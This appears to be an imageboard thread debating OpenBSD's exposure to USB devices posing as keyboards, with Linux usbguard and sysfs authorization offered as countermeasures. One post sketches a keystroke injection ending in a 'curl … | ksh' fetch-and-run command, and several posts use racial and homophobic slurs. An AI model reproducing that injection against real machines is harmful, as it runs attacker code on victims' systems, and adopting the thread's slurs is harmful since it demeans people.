>inserts USB pendrive
>gets hacked
attack from 2014
used in the wild ever since
OpenBSD unfixed
inbout seething morons:
>UH IT'S PHYSICAL ACCESS
no you dimwitted mutt, it's not
 |
 CRIME Shirt $21.68 |
|
can OpenBSD be made secure?
>inserts USB pendrive
>gets hacked
attack from 2014
used in the wild ever since
OpenBSD unfixed
inbout seething morons:
>UH IT'S PHYSICAL ACCESS
no you dimwitted mutt, it's not
|
CRIME Shirt $21.68 |
|
Linux fixed it with usbguard
But BSD lacks the /proc/...authorized_default and authorized
BSD is wide open.
>hurrr physical access
it's as bad as if your computer would get hacked from inserting an DVD or floppy disk.
imagine being as bad as windows idiots who auto run the autorun.ini on DVD.
>os focused on security
apparently not
is there a solution for this problem?
glue up your usb ports
bios locks and bios option to disable usb
if you are able to insert a usb stick into a machine running openbsd you are also able to just reboot it into single user mode which does not ask for a password, so if you are bothering with using a usb stick at that point you're basically a moronic Black person, and a homosexual.
This is the dumbest fricking thread I've seen in a while, and that's counting all the AI garbage in the catalog.
What about the discord threads?
>>UH IT'S PHYSICAL ACCESS
>no you dimwitted mutt, it's not
Why not? Why are you even plugging in random flash drives to begin with?
somehow IQfy blocks me from replying to this thread with some details, and then IP bans (is it expired now, if you are reading this text then it expired or something).
broken spam detection?
Just post a screenshot of the post you're trying to make.
>Just post a screenshot of the post you're trying to make.
come to think of it, it probably seethes at the URL with word hack in it.
let's see:
*inserts USB pendrive*
USB: hi, I self-identify as a keyboard.
kernel: you do? LOL OK I will give you full access as input device, LAMAO
USB: <ctrl><f2>xterm<enter>curl XXXXX | ksh<ENTER>exit<ENTER>
>w-what?? did a terminal window just flashed for a second, wtf??
>...WTF why I am locked out of this machine? reeeee reeeeeeeeee
>is there a solution for this problem?
OpenBSD needs to add an API that makes USB blocked by default, and allows to investigate USB interface/class, and then decide to allow it or keep it blocked.
Linux does it as above, usbguard + /proc/...authorized
How does that protect against a device presenting itself as something it's not? Or even that it is, but then behaves maliciously
Okay, that's bad. But hear me out. What if I just locked my windows and doors on my house when I'm gone and didn't plug in random USB sticks from the sidewalk?
>Login incorrect
>somehow IQfy
i am pretty sure that iamgeboard share hte same backend of 4chinz
>b&
it is just dynamic IP stuff, some guy had gotten banned in your area years ago
Interesting... do distros implement usbguard by default?
I hope not, the project looks abandoned. There are 100+ open issues and the last version of usbguard came in 2022.
>I hope not, the project looks abandoned.
>the program to parse rules like "if device is storage then allow ; if keyboard then deny unless in usb port 1.2" needs UPDOOOOTS every 2 months!
>update to version 2024-covid24-omicron-boosted4 today!! don't forget to buy season pass and new DLCs
lol no
>people want 100000 things done for them to extend the project
not my problem
>irrelevant nonsense
If it's such an important tool, it shouldn't have bug reports open for 2 years without addressing them.
>Interesting... do distros implement usbguard by default?
Most distros probably do have the program usbgurad,
but even if not - then all Linuxes have the /proc/ entires needed, you can go in with "cd" when see devnum/busnum files and do lsusb -D .... on device, check the class/interface of this device
and then echo 1 > authorized
you must echo 0 > authorized_default in /proc/ first
be careful to not lock yourself out of the actual keyboard if it's on USB (you can't replug it)
settings go away on reboot
I do not know of distros that enable this by default. but would be nice to have it.
on OpenBSD the kernel seems to lack any mechanism to build such protection at all.
>How does that protect against a device presenting itself as something it's not? Or even that it is, but then behaves maliciously
the usb class/interface determines what kernel allows device to do.
only devices of classes like HID will be detected (by something.. udev? kernel? dunno) and attached as the keyboard/mouse inputs.
device can't change class/interface in the middle, it would need to logically "disconnect" and "connect" again at which point it again is NOT authorized if authorized_default is 0.
usbguard is a daemon (+gui client) that checks new devices and checks rules for black/white list
epoxy in usb ports
>epoxy in usb ports
fricking IDIOT.
he doesn't understand the attack - it's YOUR GOAL to read data from usb pendrive, or use usb wifi, or use usb dvd reader, so you can't expoxy it
i dont care about usb so works for me
If it's my goal to insert random usb device in random port, then that's my goal and the rules and manual authorization are also in the way.
>OpenBSD is insecure unless you yourself built the USB device from semiconductors, or audited it's entire hardware and firmware
>i dont care about usb so works for me
>don't plug in USB
OpenBSD users admit defeat.
i use linux and have epoxied usb because usb is satan
ubguard is another attack vector for me
>>don't plug in USB
I said don't plug in USB devices from the sidewalk or parking lot.
>I said don't plug in USB devices from the sidewalk or parking lot.
he thinks USB devices that are not aqcuired from parking lot can't be malware
LOL>
Show me an example of store bought flash drives coming pre-loaded with malware targeting OpenBSD.
>ignore this attack on BSD
>because no one uses BSD
>therefore it is secure
lol
cuck license
I use FreeBSD, how does this affect me?
cute
why is everyone falling of blatant bait? is this board filled with redditors?
Don't electrically connect untrusted hardware to your computer ... How hard is it? Almost every computer is vulnerable to this "attack".
> hello computer i am usb device
> hello usb device
> *shorts all 4 contacts for 420 miliseconds*
> conputer has to reboot sorry
> hello computer i am usb hub with keyboard and bootable mass storage
> okay thank you user what do you want to typ...
> f12, left, left, enter, down, down, down, enter, left, enter, enter, down, down, enter, down, f5, f5, enter, f10, enter
> hello computer you are running code from the usb device the user just plugged in in privilege ring 0
i don't think your beloved usbguard:
* prevents short circuit of usb pins
* works before computer is booted
well precisely, it's not a pen drive, it's a gadget
and the first thing you'd notice if you stuck it in was your computer rebooting, at which point you'd take it out
attack wouldn't work if you turn off USB keyboard support in the BIOS on your old Thinkpad either, this shit is gay-tarded
>insert mystery usb into computer
>computer reboots and does weird shit
>just sit there watching like a moron
user error
These attacks are realtime, it's not like you have some pajeet connecting over VNC to your PC trying to manually type in every command
>* prevents short circuit of usb pins
not hacking but just destroying computer. secrets are safe
attack is not silent at all
>* works before computer is booted
plug things once OS is booted up
Every corner of the Internet is filled with glowBlack folk seething about and coping with OpenBSD. And they all use the same few talking points. It's easy to notice. It's salty.
What points do they use? I just want to know if I somehow became a glowBlack person without my knowledge.
not her but
>threat model
>memory safety
>O(2**n) scheduler
>hardware support
>blowjob mascot
Looks like I am safe then. I just complain about performance and Bluetooth.
>Bluetooth
hardware support
Oh shit.
But what if you chose something like Linux because of these reasons?
Should, when someone says to use OpenBSD, you just say "no" and give no other reason?
>physical access to a serial bus line doesn't count as physical access
You're moronic.